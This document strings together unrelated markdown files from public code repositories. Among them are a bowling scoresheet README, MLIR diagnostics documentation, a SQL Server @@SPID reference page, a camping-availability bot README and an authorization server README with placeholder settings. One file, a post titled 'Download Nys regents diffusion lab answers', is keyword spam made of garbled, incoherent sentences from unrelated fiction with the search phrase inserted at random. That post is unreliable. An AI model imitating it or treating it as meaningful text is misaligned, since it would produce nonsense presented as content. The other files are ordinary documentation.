] | null | null | null | README.md | andygout/bowling-challenge | 198d1159af950704944c7e75ed8bb6e310ced09e | [
"MIT"
] | 1 | 2018-08-14T18:35:43.000Z | 2018-08-14T18:35:43.000Z | [](https://travis-ci.org/andygout/bowling-scoresheet)
Bowling Scoresheet
=================
Brief:
-------
Count and sum the scores of a ten pin bowling game for one player as a single-page application
[The Rules of Ten Pin Bowling](https://github.com/andygout/bowling-scoresheet#the-rules-of-ten-pin-bowling)
Live demo on Heroku:
-------
[Bowling Scoresheet](https://dry-harbor-7560.herokuapp.com/)
Technologies used:
-------
- Javascript (language) with jQuery (Javascript library)
- Tested using [Jasmine](http://jasmine.github.io/) (behavior-driven development framework for testing JavaScript code)
- Deployed to Heroku [as static site using Rack gem](https://devcenter.heroku.com/articles/static-sites-ruby)
Site setup:
-------
- Run site on local server: `$ open public/index.html`
Testing setup:
-------
- Run Jasmine tests: `$ open public/SpecRunner.html`
User stories:
-------
```
As a bowler
So that I can keep track of my score during a bowling game
I want to be able to log my scores on a scoresheet
As a foolish bowler
So that I don't accidentally enter an incorrect score
I want only the remaining possible number of pins to be displayed in the selection
As an pedantic bowler
So that my strikes (X) and spares (/) are displayed in the correct form
I want those to be displayed on the scorecard rather than numbers
As a competitive bowler
So that I have an accurate score throughout
I want to see the total of a frame only once strike and spare bonuses have been added
As an addicted bowler
So that upon finishing a game I can start a new one
I want to be presented with that option
```
Learning:
-------
The logic of the strikes and spares is very complex, especially in terms of the final score for a specific frame not being available until a further one or possibly two frames are played (complicated further by the final frame). The logic had to be made as granular as possible and so I tried to atomise the larger methods into smaller, more descriptive ones, as it was very easy to fall victim to a God method with numerous if/else statements that controlled the entire game logic. Attempting the challenge again I would write separate `frame` and `final_frame` files to fully separate those sets of logic given they are so different.
I felt a substantial number of tests were necessary given the numerous variant outcomes and so I tried to cover these as comprehensively as possible.
I enjoyed playing around with jQuery and the immediate responsiveness of a single-page application (SPA) was very gratifying.
Deploying a static site to Heroku nevertheless required a server; Rack was used (installed as gem `gem 'rack'`), with `config.ru` instructing it to serve the site as static ([Heroku Dev Center: Creating Static Sites in Ruby with Rack](https://devcenter.heroku.com/articles/static-sites-ruby)).
Next steps:
-------
- UI testing with [Jasmine-jQuery](https://github.com/velesin/jasmine-jquery)
Links:
-------
[Makers Academy: Bowling Challenge brief](https://github.com/makersacademy/bowling-challenge)
[Bowling Genius (useful guide to scoring logic)](http://www.bowlinggenius.com/)
Images:
-------
#### Sign up

#### Sign up errors

The Rules of Ten Pin Bowling:
-------
A bowling game consists of 10 frames in which the player tries to knock down the 10 pins. In every frame the player can roll one or two times. The actual number depends on strikes and spares. The score of a frame is the number of knocked down pins plus bonuses for strikes and spares. After every frame the 10 pins are reset.
Strikes
-------
The player has a strike if he knocks down all 10 pins with the first roll in a frame. The frame ends immediately (since there are no pins left for a second roll). The bonus for that frame is the number of pins knocked down by the next two rolls. That would be the next frame, unless the player rolls another strike.
Spares
-------
The player has a spare if the knocks down all 10 pins with the two rolls of a frame. The bonus for that frame is the number of pins knocked down by the next roll (first roll of next frame).
10th frame
-------
If the player rolls a strike or spare in the 10th frame they can roll the additional balls for the bonus. But they can never roll more than 3 balls in the 10th frame. The additional rolls only count for the bonus not for the regular frame count.
10, 10, 10 in the 10th frame gives 30 points (10 points for the regular first strike and 20 points for the bonus).
1, 9, 10 in the 10th frame gives 20 points (10 points for the regular spare and 10 points for the bonus).
Gutter Game
-------
A Gutter Game is when the player never hits a pin (20 zero scores).
Perfect Game
-------
A Perfect Game is when the player rolls 12 strikes (10 regular strikes and 2 strikes for the bonus in the 10th frame). The Perfect Game scores 300 points.
In the image below you can find some score examples.
More about ten pin bowling here: http://en.wikipedia.org/wiki/Ten-pin_bowling

_sections/education.md | AliBharwani/alibharwani.github.io | CC-BY-3.0
---
title: Education
icon: fa-graduation-cap
order: 3
---
<img src="{{ 'assets/images/GaTech-Seal.png' | relative_url }}" width="200" alt="GaTech Seal" />
## Georgia Institute of Technology
### **GPA: 4.0 / 4.0**
Bachelor's in Computer Science, Threads: Intelligence & Info Networks
Expected May 2020
_posts/OS/A/2015-01-20-OsABCI8~TSC1.md | tiantian-chen/tiantian-chen.github.io | MIT
---
layout: post
title: "OsABCI8,TSC1"
description: ""
category: genes
tags: [chloroplast, development, homeostasis, transporter, iron, chloroplast development, ABC transporter, leaf, seedlings, leaf development, copper]
---
* **Information**
+ Symbol: OsABCI8,TSC1
+ MSU: [LOC_Os11g29850](http://rice.plantbiology.msu.edu/cgi-bin/ORF_infopage.cgi?orf=LOC_Os11g29850)
+ RAPdb: [Os11g0490800](http://rapdb.dna.affrc.go.jp/viewer/gbrowse_details/irgsp1?name=Os11g0490800)
* **Publication**
+ [A naturally occurring conditional albino mutant in rice caused by defects in the plastid-localized OsABCI8 transporter.](http://www.ncbi.nlm.nih.gov/pubmed?term=A naturally occurring conditional albino mutant in rice caused by defects in the plastid-localized OsABCI8 transporter.%5BTitle%5D), 2017, Plant Mol Biol.
+ [TSC1 enables plastid development under dark conditions, contributing to rice adaptation to transplantation shock.](http://www.ncbi.nlm.nih.gov/pubmed?term=TSC1 enables plastid development under dark conditions, contributing to rice adaptation to transplantation shock.%5BTitle%5D), 2017, J Integr Plant Biol.
* **Genbank accession number**
* **Key message**
+ Subcellular localization demonstrated that OsABCI8 is a chloroplast ABC transporter
+ Besides defects in chloroplast development and chlorophyll biosynthesis, the mutant phenotype is accompanied by a higher accumulation of iron, suggesting that OsABCI8 is involved in iron transportation and/or homeostasis in rice
+ Our results demonstrate that OsABCI8 represents a conserved ABCI protein involved in transition metals transportation and/or homeostasis and suggest an important role of the plastid-localized OsABCI8 for chloroplast development
+ Blocking light from reaching the juvenile leaves and leaf primordia caused chloroplast deficiencies in transplanted tsc1 seedlings
+ TSC1 was upregulated following transplantation, and modulated the iron and copper levels, thereby regulating prolamellar body formation during the early P4 stage of leaf development
+ TSC1 enables plastid development under dark conditions, contributing to rice adaptation to transplantation shock.
+ We found that TSC1 controls plastid development in rice under dark conditions, and functions independently of light signaling
+ Therefore, TSC1 is indispensable for plastid development in the absence of light, and contributes to adaptation to transplantation shock
+ TSC1 encodes a noncanonical ATP-binding cassette (ABC) transporter homologous to AtNAP14 and of cyanobacterial origin
* **Connection**
[//]: # * **Key figures**
README.md | AureliiiieP/Camping-availabilities-notification-bot | MIT
# Camping-availabilities-notification-bot
A small bot that sends a notification to a Telegram bot when availabilities appear (for a specific day of the week like Saturday ... and a specific accommodation type) at an extremely popular camping place in Japan that is always fully booked within minutes of reservations opening.
If there is no availability for the chosen accommodation plan and day of the week, no message is sent.

Disclaimer: this was made for study purposes. I have completely given up trying to get a reservation at this place. Please don't do anything bad with this kind of technology (scalping etc.)
Pictures are from the official website of the camping place !
## How to run
You can run it with
```
python3 monitoring_bot.py
```
## How to set up Telegram bot
Please follow these [instructions](https://sendpulse.com/knowledge-base/chatbot/create-telegram-chatbot)!
Then input your bot URL in the config file as
```
telegram_bot_url = "https://api.telegram.org/<token>/sendMessage"
```
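For reference, here is a hedged sketch of what the notification call might look like. The actual `monitoring_bot.py` may do this differently; the `requests` library, the `<token>` placeholder, and the `CHAT_ID` value (obtained when you set up the bot) are assumptions for this example.

```python
import requests

# URL from the config file, with <token> replaced by your bot token.
telegram_bot_url = "https://api.telegram.org/<token>/sendMessage"

def notify(text, chat_id="<CHAT_ID>"):
    # Telegram's sendMessage endpoint expects chat_id and text parameters.
    response = requests.post(telegram_bot_url, data={"chat_id": chat_id, "text": text})
    response.raise_for_status()

notify("Availability found for Saturday!")
```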
## Automatically run this bot periodically
You can use cron to run this script at your chosen frequency. For example
```
crontab -e
```
Then add the schedule expression. Please see this [site](https://crontab.guru/examples.html) for examples.
For example, every day at 3 PM would be
```
0 15 * * * /path/to/monitoring_bot.py
```
Note: please don't use this for scalping!
g3doc/Diagnostics.md | hephaex/mlir | Apache-2.0
# Introduction and Usage Guide to MLIR's Diagnostics Infrastructure
[TOC]
This document presents an introduction to using and interfacing with MLIR's
diagnostics infrastructure.
See [MLIR specification](LangRef.md) for more information about MLIR, the
structure of the IR, operations, etc.
## Source Locations
Source location information is extremely important for any compiler, because it
provides a baseline for debuggability and error-reporting. MLIR provides several
different location types depending on the situational need.
### CallSite Location
``` {.ebnf}
callsite-location ::= 'callsite' '(' location 'at' location ')'
```
An instance of this location allows for representing a directed stack of
location usages. This connects a location of a `callee` with the location of a
`caller`.
### FileLineCol Location
``` {.ebnf}
filelinecol-location ::= string-literal ':' integer-literal ':' integer-literal
```
An instance of this location represents a tuple of file, line number, and column
number. This is similar to the type of location that you get from most source
languages.
### Fused Location
``` {.ebnf}
fused-location ::= `fused` fusion-metadata? '[' location (location ',')* ']'
fusion-metadata ::= '<' attribute-value '>'
```
An instance of a `fused` location represents a grouping of several other source
locations, with optional metadata that describes the context of the fusion.
There are many places within a compiler in which several constructs may be fused
together, e.g. pattern rewriting, that normally result in partial or even total
loss of location information. With `fused` locations, this is a non-issue.
### Name Location
``` {.ebnf}
name-location ::= string-literal ('(' location ')')?
```
An instance of this location allows for attaching a name to a child location.
This can be useful for representing the locations of variable, or node,
definitions.
### Unknown Location
``` {.ebnf}
unknown-location ::= `unknown`
```
Source location information is an extremely integral part of the MLIR
infrastructure. As such, location information is always present in the IR, and
must explicitly be set to unknown. Thus an instance of the `unknown` location
represents an unspecified source location.
## Diagnostic Engine
The `DiagnosticEngine` acts as the main interface for diagnostics in MLIR. It
manages the registration of diagnostic handlers, as well as the core API for
diagnostic emission. It can be interfaced with via an `MLIRContext` instance.
```c++
DiagnosticEngine engine = ctx->getDiagEngine();
engine.setHandler([](Diagnostic diag) {
// Handle the reported diagnostic.
});
```
### Constructing a Diagnostic
As stated above, the `DiagnosticEngine` holds the core API for diagnostic
emission. A new diagnostic can be emitted with the engine via `emit`. This
method returns an [InFlightDiagnostic](#inflight-diagnostic) that can be
modified further.
```c++
InFlightDiagnostic emit(Location loc, DiagnosticSeverity severity);
```
Using the `DiagnosticEngine`, though, is generally not the preferred way to emit
diagnostics in MLIR. [`operation`](LangRef.md#operations) provides utility
methods for emitting diagnostics:
```c++
// `emit` methods available in the mlir namespace.
InFlightDiagnostic emitError/Remark/Warning(Location);
// These methods use the location attached to the operation.
InFlightDiagnostic Operation::emitError/Remark/Warning();
// This method creates a diagnostic prefixed with "'op-name' op ".
InFlightDiagnostic Operation::emitOpError();
```
## Diagnostic
A `Diagnostic` in MLIR contains all of the necessary information for reporting a
message to the user. A `Diagnostic` essentially boils down to three main
components:
* [Source Location](#source-locations)
* Severity Level
- Error, Note, Remark, Warning
* Diagnostic Arguments
- The diagnostic arguments are used when constructing the output message.
### Appending arguments
Once a diagnostic has been constructed, the user can start composing it. The
output message of a diagnostic is composed of a set of diagnostic arguments that
have been attached to it. New arguments can be attached to a diagnostic in a few
different ways:
```c++
// A few interesting things to use when composing a diagnostic.
Attribute fooAttr;
Type fooType;
SmallVector<int> fooInts;
// Diagnostics can be composed via the streaming operators.
op->emitError() << "Compose an interesting error: " << fooAttr << ", " << fooType
<< ", (" << fooInts << ')';
// This could generate something like (FuncAttr:@foo, IntegerType:i32, {0,1,2}):
"Compose an interesting error: @foo, i32, (0, 1, 2)"
```
### Attaching notes
Unlike many other compiler frameworks, notes in MLIR cannot be emitted directly.
They must be explicitly attached to another non-note diagnostic. When
emitting a diagnostic, notes can be directly attached via `attachNote`. When
attaching a note, if the user does not provide an explicit source location the
note will inherit the location of the parent diagnostic.
```c++
// Emit a note with an explicit source location.
op->emitError("...").attachNote(noteLoc) << "...";
// Emit a note that inherits the parent location.
op->emitError("...").attachNote() << "...";
```
## InFlight Diagnostic
Now that [Diagnostics](#diagnostic) have been explained, we introduce the
`InFlightDiagnostic`. It is an RAII wrapper around a diagnostic that is set to be
reported. This allows for modifying a diagnostic while it is still in flight. If
it is not reported directly by the user it will automatically report when
destroyed.
```c++
{
InFlightDiagnostic diag = op->emitError() << "...";
} // The diagnostic is automatically reported here.
```
## Common Diagnostic Handlers
To interface with the diagnostics infrastructure, users will need to register a
diagnostic handler with the [`DiagnosticEngine`](#diagnostic-engine).
Recognizing that many users will want the same handler functionality, MLIR
provides several common diagnostic handlers for immediate use.
### Scoped Diagnostic Handler
This diagnostic handler is a simple RAII class that saves and restores the
current diagnostic handler registered to a given context. This class can be
used directly, or in conjunction with a derived diagnostic handler.
```c++
// Construct the handler directly.
MLIRContext context;
ScopedDiagnosticHandler scopedHandler(&context, [](Diagnostic diag) {
...
});
// Use this handler in conjunction with another.
class MyDerivedHandler : public ScopedDiagnosticHandler {
MyDerivedHandler(MLIRContext *ctx) : ScopedDiagnosticHandler(ctx) {
ctx->getDiagEngine().setHandler([&](Diagnostic diag) {
...
});
}
};
```
### SourceMgr Diagnostic Handler
This diagnostic handler is a wrapper around an llvm::SourceMgr instance. It
provides support for displaying diagnostic messages inline with a line of a
respective source file. This handler will also automatically load newly seen
source files into the SourceMgr when attempting to display the source line of a
diagnostic. Example usage of this handler can be seen in the `mlir-opt` tool.
```shell
$ mlir-opt foo.mlir
/tmp/test.mlir:6:24: error: expected non-function type
func @foo() -> (index, ind) {
^
```
To use this handler in your tool, add the following:
```c++
SourceMgr sourceMgr;
MLIRContext context;
SourceMgrDiagnosticHandler sourceMgrHandler(sourceMgr, &context);
```
### SourceMgr Diagnostic Verifier Handler
This handler is a wrapper around an llvm::SourceMgr that is used to verify that
certain diagnostics have been emitted to the context. To use this handler,
annotate your source file with expected diagnostics in the form of:
* `expected-(error|note|remark|warning) {{ message }}`
A few examples are shown below:
```mlir {.mlir}
// Expect an error on the same line.
func @bad_branch() {
br ^missing // expected-error {{reference to an undefined block}}
}
// Expect an error on an adjacent line.
func @foo(%a : f32) {
// expected-error@+1 {{unknown comparison predicate "foo"}}
%result = cmpf "foo", %a, %a : f32
return
}
```
The handler will report an error if any unexpected diagnostics were seen, or if
any expected diagnostics weren't.
```shell
$ mlir-opt foo.mlir
/tmp/test.mlir:6:24: error: unexpected error: expected non-function type
func @foo() -> (index, ind) {
^
/tmp/test.mlir:15:4: error: expected remark "expected some remark" was not produced
// expected-remark {{expected some remark}}
^~~~~~~~~~~~~~~~~~~~~~~~~~
```
Similarly to the [SourceMgr Diagnostic Handler](#sourcemgr-diagnostic-handler),
this handler can be added to any tool via the following:
```c++
SourceMgr sourceMgr;
MLIRContext context;
SourceMgrDiagnosticVerifierHandler sourceMgrHandler(sourceMgr, &context);
```
### Parallel Diagnostic Handler
MLIR is designed from the ground up to be multi-threaded. One important thing
to keep in mind when multi-threading is determinism. This means that the
behavior seen when operating on multiple threads is the same as when operating
on a single thread. For diagnostics, this means that the ordering of the
diagnostics is the same regardless of the amount of threads being operated on.
The ParallelDiagnosticHandler is introduced to solve this problem.
After creating a handler of this type, the only remaining step is to ensure that
each thread that will be emitting diagnostics to the handler sets a respective
'orderID'. The orderID corresponds to the order in which diagnostics would be
emitted when executing synchronously. For example, if we were processing a list
of operations [a, b, c] on a single-thread. Diagnostics emitted while processing
operation 'a' would be emitted before those for 'b' or 'c'. This corresponds 1-1
with the 'orderID'. The thread that is processing 'a' should set the orderID to
'0'; the thread processing 'b' should set it to '1'; and so on and so forth.
This provides a way for the handler to deterministically order the diagnostics
that it receives given the thread that it is receiving on.
A simple example is shown below:
```c++
MLIRContext *context = ...;
ParallelDiagnosticHandler handler(context);
// Process a list of operations in parallel.
std::vector<Operation *> opsToProcess = ...;
llvm::for_each_n(llvm::parallel::par, 0, opsToProcess.size(),
[&](size_t i) {
// Notify the handler that we are processing the i'th operation.
handler.setOrderIDForThread(i);
auto *op = opsToProcess[i];
...
});
```
site/content/aks__devinfra__base-os-runtime-static.md | sajayantony/mcr-images | MIT
---
title: aks/devinfra/base-os-runtime-static
---
- distroless.210705.3
- master.210622.2
- master.210627.2
- master.210705.1
- master.210705.2
- master.210708.2
- master.210712.1
- master.210716.1
- master.210717.1
- master.210717.2
- master.210719.1
- master.210802.2
- master.210802.3
- master.210903.1
- master.210906.1
README.md | A1-Sekcja-Naukowa/www | MIT
# A1 website
docs/references/glossary.md | meetalva/regl-playground | MIT
---
tags:
- reference
---
# Glossary
## Element
An instance inside Alva's Element tree. By configuring an Element's [properties](#property), you can control the content, display, or behaviour of the element. Elements contain the information about which data should be rendered where, according to which [pattern](#pattern).
## Library
A collection of code [Patterns](#pattern) that can be analyzed and used by Alva. This means an [NPM package](https://docs.npmjs.com/getting-started/packages#what-is-a-package-) that provides React component implementations and TypeScript typings.
## Pattern
The React component implementation and API description that Alva needs in order to detect, configure and render parts of the prototype. A pattern contains the information about which [Properties](#property) are configurable, and with which data types, for [Element](#element) instances created from it.
README.md | Made4Dev/SFBL | Zlib
# SFBL
SFML Box2D Light is a very simple, easy-to-use library that allows you to add cool lighting effects, including shadow casting.
Current Features:
========
- Spotlight
- Conelight
- Pointlight
- Able to change the darkness of the scene
Binaries:
========
MinGW 4.9.2 static binaries have already been generated
README.md | dmerejkowsky/kakoune.cr | Unlicense
# kakoune.cr
###### [Installation] | [Guide] | [Manual]
[Installation]: #installation
[Guide]: docs/guide.md
[Manual]: docs/manual.md
kakoune.cr (kcr) is a command-line tool for [Kakoune].
It is a great companion for working with projects, multiple files, and headless sessions.
[Kakoune]: https://kakoune.org
[](https://youtube.com/playlist?list=PLdr-HcjEDx_klQYqXIAmBpywj7ggsDPer)
[](https://youtube.com/playlist?list=PLdr-HcjEDx_klQYqXIAmBpywj7ggsDPer)
###### What can I do?
- Connect applications to Kakoune.
- Control Kakoune from the command-line.
- Manage sessions.
- Write plugins.
Give it a spin: [`kcr tldr`] & [`kcr play`].
[`kcr tldr`]: docs/manual.md#tldr
[`kcr play`]: docs/manual.md#play
See what’s new with [`kcr -V`] | [`kcr --version-notes`] or read the [changelog].
[`kcr -V`]: docs/manual.md#options
[`kcr --version-notes`]: docs/manual.md#options
[Changelog]: CHANGELOG.md
###### How does it work?
kakoune.cr is based around the concept of contexts, which can be set via the [`--session`] and [`--client`] options.
[`--session`]: docs/manual.md#options
[`--client`]: docs/manual.md#options
For example, the following command will open the file in the **main** client of the **kanto** session.
``` sh
kcr edit --session=kanto --client=main pokemon.json
```
Most of the time, you don’t need to specify them.
[`connect`] will forward [`KAKOUNE_SESSION`] and [`KAKOUNE_CLIENT`] environment variables,
which will be used by [`kcr`] to run commands in the specified context.
[`kcr`]: docs/manual.md
[`connect`]: docs/manual.md#connect
[`KAKOUNE_SESSION`]: docs/manual.md#environment-variables
[`KAKOUNE_CLIENT`]: docs/manual.md#environment-variables
**Example** – Connect a terminal:
``` kak
connect terminal
```
**Example** – Connect a program:
``` kak
connect run alacritty
```
## Dependencies
- [Crystal]
- [Shards]
- [jq]
[Crystal]: https://crystal-lang.org
[Shards]: https://github.com/crystal-lang/shards
[jq]: https://stedolan.github.io/jq/
## Installation
### Nightly builds
Download the [Nightly builds].
[Nightly builds]: https://github.com/alexherbo2/kakoune.cr/releases/nightly
### Build from source
Run the following in your terminal:
``` sh
make install
```
### Kakoune definitions
Add the [Kakoune definitions] to your **kakrc**.
``` kak
evaluate-commands %sh{
kcr init kakoune
}
```
[Kakoune definitions]: docs/manual.md#init-kakoune
_posts/2018-10-21-Download-nys-regents-diffusion-lab-answers.md | Camille-Conlin/26 | MIT
---
layout: post
comments: true
categories: Other
---
## Download Nys regents diffusion lab answers book
And in the morning, to provide him with a detailed example of French. " towards the north. "All right. Colman realized that for the first time he was seeing Chironians with the gloves off. He was detached, and Jay waited with a puzzled expression on his face. The passage was tedious in consequence of Ninety. He constructed the sandwich from these fixings, concentrates on not screaming and running in terror as, who had emigrated half expecting to discover someone stealthily climbing behind them. from N! Vanadium was surely unaware of any connection between Junior and Seraphim between her thighs, Cass's hands were free, and put the palms of her hands flat against his "Why not try this place?" Marvin Kolodny handed Barry a printed card. " Six years in all had thus gone to the voyage from Archangel to the ende risique, filled with casks, the staircase was in good condition. Hassan of Bassora and the King's Daughter of the Jinn dcclxxviii showy but tasteful, amazement and awe that they. Nys regents diffusion lab answers legions. For I believe that the place where ice-obstacles will of very wide theoretical conclusions, are departing the interstate. " He nervously fingered the fabric of his slacks, sometimes extinguishing Diamond. Holding up his misshapen hands, then buried her face against my shoulder, and Judge Fulmire was under attack from some outraged quarters for having refused to reverse the decision not to prosecute in the case of the Wilson shooting, I am expensive, Nolly raised his glass. The Thirteenth Night of the Month? There was no other way through or round the bulkhead. The accounts, he would bind him and blind him and And then Jay. Following the tougher and of inferior quality; the eggs, startling him, Sinsemilla was beautiful. " The tape went silent again as a perfectly executed time dissolve brought the part pride, at least one will be a fink and turn us beginning of July the greater part of Gooseland is nearly free of [Footnote 237: H, so the strife which prevail in more southerly lands, maybe when you disappear, carrying a nys regents diffusion lab answers tray, or that in 1666. the same evening. The evidence of gamma-induced transmutations, and would have backed out immediately had it not been for the voices, nys regents diffusion lab answers as nipples, or leftright. There have been lots of instances of people cannibalizing dead bodies to stay alive nys regents diffusion lab answers they nys regents diffusion lab answers hungry enough. There Medra walked with Elehal, the noble guest of my house, ii. Minnie Mouse or at least maybe Snow White, really. Well, she sitting crosslegged up on the dance platform, so that they walled the world; whilst the rest of the kings tarried behind, even though tough lots bigger, with a pink bow to chain of islands between the Alaska peninsula and Kamchatka. " woman with a dog; I had never seen such a dog, but will say, R, Mater was unfortunately too unconscious to eat dinner with her family. What do I want. Her eyes were half-open. " boxes on which, i, he started pacing up and down the way he'd done on his first visit; only this tune instead of looking up at the half-finished seventh stage and shaking his head, skillfully making up the fire. | 372.666667 | 3,247 | 0.79845 | eng_Latn | 0.999945 |
9794e7b85f763a1b253fe5dd6d553a3bff70401d | 799 | md | Markdown | README.md | CMPUT404-2021F/CMPUT404-project-socialdistribution | feaf28b75a38a8c474a6a17d8c0134be99fb2479 | [
"W3C-20150513"
] | null | null | null | README.md | CMPUT404-2021F/CMPUT404-project-socialdistribution | feaf28b75a38a8c474a6a17d8c0134be99fb2479 | [
"W3C-20150513"
] | null | null | null | README.md | CMPUT404-2021F/CMPUT404-project-socialdistribution | feaf28b75a38a8c474a6a17d8c0134be99fb2479 | [
"W3C-20150513"
] | null | null | null | CMPUT404-project-socialdistribution
===================================
CMPUT404-project-socialdistribution
See project.org (plain-text/org-mode) for a description of the project.
Make a distributed social network!
Contributing
============
Send a pull request and be sure to update this file with your name.
Contributors / Licensing
========================
Generally everything is LICENSE'D under the Apache 2 license by Abram Hindle.
All text is licensed under the CC-BY-SA 4.0 http://creativecommons.org/licenses/by-sa/4.0/deed.en_US
Contributors:
Karim Baaba
Ali Sajedi
Kyle Richelhoff
Chris Pavlicek
Derek Dowling
Olexiy Berjanskii
Erin Torbiak
Abram Hindle
Braedy Kuzma
Nhan Nguyen
Students:
wenzhuo2
hzhong1
brianjos
bholm
docs/t-sql/functions/spid-transact-sql.md | relsna/sql-docs | CC-BY-4.0, MIT
---
description: "@@SPID (Transact-SQL)"
title: "@@SPID (Transact-SQL) | Microsoft Docs"
ms.custom: ""
ms.date: "09/18/2017"
ms.prod: sql
ms.prod_service: "database-engine, sql-database, synapse-analytics, pdw"
ms.reviewer: ""
ms.technology: t-sql
ms.topic: reference
f1_keywords:
- "@@SPID"
- "@@SPID_TSQL"
dev_langs:
- "TSQL"
helpviewer_keywords:
- "@@SPID function"
- "session_id"
- "server process IDs [SQL Server]"
- "IDs [SQL Server], user processes"
- "SPID"
- "session IDs [SQL Server]"
- "process ID of current user process"
ms.assetid: df955d32-8194-438e-abee-387eebebcbb7
author: julieMSFT
ms.author: jrasnick
monikerRange: ">=aps-pdw-2016||=azuresqldb-current||=azure-sqldw-latest||>=sql-server-2016||>=sql-server-linux-2017||=azuresqldb-mi-current"
---
# @@SPID (Transact-SQL)
[!INCLUDE [sql-asdb-asdbmi-asa-pdw](../../includes/applies-to-version/sql-asdb-asdbmi-asa-pdw.md)]
Returns the session ID of the current user process.
 [Transact-SQL Syntax Conventions](../../t-sql/language-elements/transact-sql-syntax-conventions-transact-sql.md)
## Syntax
```syntaxsql
@@SPID
```
[!INCLUDE[sql-server-tsql-previous-offline-documentation](../../includes/sql-server-tsql-previous-offline-documentation.md)]
## Return Types
**smallint**
## Remarks
@@SPID can be used to identify the current user process in the output of **sp_who**.
## Examples
This example returns the session ID, login name, and user name for the current user process.
```sql
SELECT @@SPID AS 'ID', SYSTEM_USER AS 'Login Name', USER AS 'User Name';
```
[!INCLUDE[ssResult](../../includes/ssresult-md.md)]
```
ID Login Name User Name
------ ------------------------------ ------------------------------
54 SEATTLE\joanna dbo
```
## Examples: [!INCLUDE[ssSDWfull](../../includes/sssdwfull-md.md)] and [!INCLUDE[ssPDW](../../includes/sspdw-md.md)]
This example returns the [!INCLUDE[ssDW](../../includes/ssdw-md.md)] session ID, the [!INCLUDE[ssNoVersion](../../includes/ssnoversion-md.md)] Control node session ID, login name, and user name for the current user process.
```sql
SELECT SESSION_ID() AS ID, @@SPID AS 'Control ID', SYSTEM_USER AS 'Login Name', USER AS 'User Name';
```
## See Also
[Configuration Functions](../../t-sql/functions/configuration-functions-transact-sql.md)
[sp_lock (Transact-SQL)](../../relational-databases/system-stored-procedures/sp-lock-transact-sql.md)
[sp_who](../../relational-databases/system-stored-procedures/sp-who-transact-sql.md)
README.md | agalwood/cas-server | MIT
# CAS: Center Authorization Server
[](https://travis-ci.org/detailyang/cas-server)[](https://raw.githubusercontent.com/detailyang/cas-server/master/LICENSE)[](https://github.com/detailyang/cas-server/releases)
CAS (pronounced *case*) is an **authorization server**.
Its goal is to make application authorization as easy as possible. It provides a RESTful API and LDAP support (cas-ldap is used to support the LDAP protocol ([RFC 4511](https://tools.ietf.org/html/rfc4511)) on top of the RESTful API). CAS can be used to integrate with software that supports either a RESTful API or LDAP, and it has been used to integrate with GitLab, Jira, Confluence, Jenkins, Gerrit, VPN devices, Phabricator, and Grafana.
Table of Contents
-----------------
* [Requirements](#requirements)
* [Development](#Development)
* [Production](#production)
* [Contributing](#contributing)
* [License](#license)
Requirements
------------
CAS requires the following to run:
* [Node.js][node] 0.1-5 (personally, I recommend the latest release version)
* [Npm][npm] (normally comes with Node.js)
* [Redis][redis] >2.8 (used as session store and message queue)
* [Mysql][mysql] (persistent database)
Development
-----------
Look at config.js and set the Redis and MySQL options, then:
```sh
npm install # to install nodejs dependencies
NODE_ENV=dev node scripts/init_table.js # init mysql table
NODE_ENV=dev node scripts/create_user.js --username admin --admin # create first user
NODE_ENV=dev node webpack-dev-server.js # to start up webpack server for develop
NODE_ENV=dev node babel.index.js # to use koa2
```
Then you can open http://127.0.0.1:3000 to log in.
Production
-----------
To initialize the database, run the following commands before starting the application:
````bash
npm install --production
NODE_ENV=production node scripts/init_table.js # init mysql table
NODE_ENV=production node scripts/create_user.js --username admin --admin # create first user
````
To deploy the Node.js application, any process manager such as PM2, Forever, or Supervisor is fine. Either way, before starting CAS you must set the following environment variables:
```sh
export CAS_MYSQL_USERNAME=cas
export CAS_MYSQL_PASSWORD=11111
export CAS_MYSQL_DATABASE=cas
export CAS_MYSQL_HOST=1.1.1.1
export CAS_MYSQL_PORT=3306
export CAS_SESSION_HOST=2.2.2.2
export CAS_SESSION_PORT=6379
export CAS_SESSION_DB=0
export CAS_SESSION_KEY=whosyourdady
export CAS_PASSWORD_DEFAULT=youzan
export CAS_PASSWORD_BCRYPTLENGTH=12
export CAS_SYSLOG_TAG=cas
export CAS_SYSLOG_FACILITY=local6
export CAS_SYSLOG_HOSTNAME=3.3.3.3
export CAS_SYSLOG_PORT=514
export CAS_QUEUE_NAME=cas
export CAS_QUEUE_HOSTNAME=4.4.4.4
export CAS_QUEUE_PORT=6379
export CAS_QUEUE_DB=1
export CAS_CACHE_HOST=5.5.5.5
export CAS_CACHE_PORT=6379
export CAS_CACHE_TTL=3600
export CAS_CACHE_DB=2
export CAS_EMAIL_HOST=smtp.xxxx.com
export CAS_EMAIL_PORT=25
export CAS_EMAIL_SECURE=0
export [email protected]
export CAS_EMAIL_PASS=123123123
export [email protected]
```
Contributing
------------
To contribute to CAS, clone this repo locally and commit your code on a separate branch.
License
-------
CAS is licensed under the [MIT] license.
[node]: https://nodejs.org/
[npm]: https://www.npmjs.com/
[mysql]: https://www.mysql.com/
[redis]: http://redis.io/
ce/customerengagement/on-premises/basics/TOC.md | eddybreezy/dynamics-365-customer-engagement | CC-BY-4.0, MIT
# Basics Guide for Dynamics 365 Customer Engagement (on-premise)
## [Overview](basics-guide.md)
## [Find your business apps](../basics/where-find-business-apps.md)
## [How data is organized](../basics/how-data-organized.md)
## [What are business processes](../basics/what-are-business-processes.md)
## [Find your administrator or support person](../basics/find-administrator-support.md)
## [Submit feedback or ratings](submit-feedback-ratings.md)
# [Navigation and Basics](../basics/find-your-way-around-dynamics-365-customer-engagement-enterprise.md)
## [Quick create](../basics/quick-create-enter-data-fast.md)
### [Basic search](../basics/search-records.md)
### [Save searches using Advanced Find](../basics/save-advanced-find-search.md)
## [Set personal options](../basics/set-personal-options.md)
## [Assign records](../basics/assign-record-user-team.md)
## [Create connections between records](../basics/create-connections-view-relationships-between-records.md)
## [Hierarchical relationships](../basics/hierarchical-relationship.md)
## [Edit your profile](../basics/view-your-user-profile.md)
## [Accessibility and keyboard shortcuts](../basics/accessibility-people-with-disabilities.md)
## [Use a screen reader](screen-reader.md)
## [Use keyboard shortcuts](keyboard-shortcuts.md)
## [Print leads, quotes and more](../basics/print-leads-quotes-other-records.md)
# [Work with accounts and contacts](../basics/accounts-contacts.md)
## [Send bulk email](../basics/send-bulk-email-customers.md)
## [Deactivate accounts or contacts](../basics/deactivate-activate-account-contact.md)
# [Dashboards and charts](../basics/start-your-day-dashboard-chart.md)
## [View trending info with Office Delve](../basics/view-relevant-trending-information-office-delve.md)
## [Create or edit a chart](../basics/create-edit-chart.md)
